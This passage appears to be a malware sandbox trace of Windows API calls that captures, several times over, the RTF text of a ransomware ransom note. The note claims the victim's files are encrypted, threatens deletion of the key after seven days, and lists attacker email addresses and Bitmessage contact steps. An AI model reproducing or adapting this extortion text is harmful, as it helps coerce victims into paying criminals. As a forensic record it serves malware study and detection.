460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.338] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.338] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" 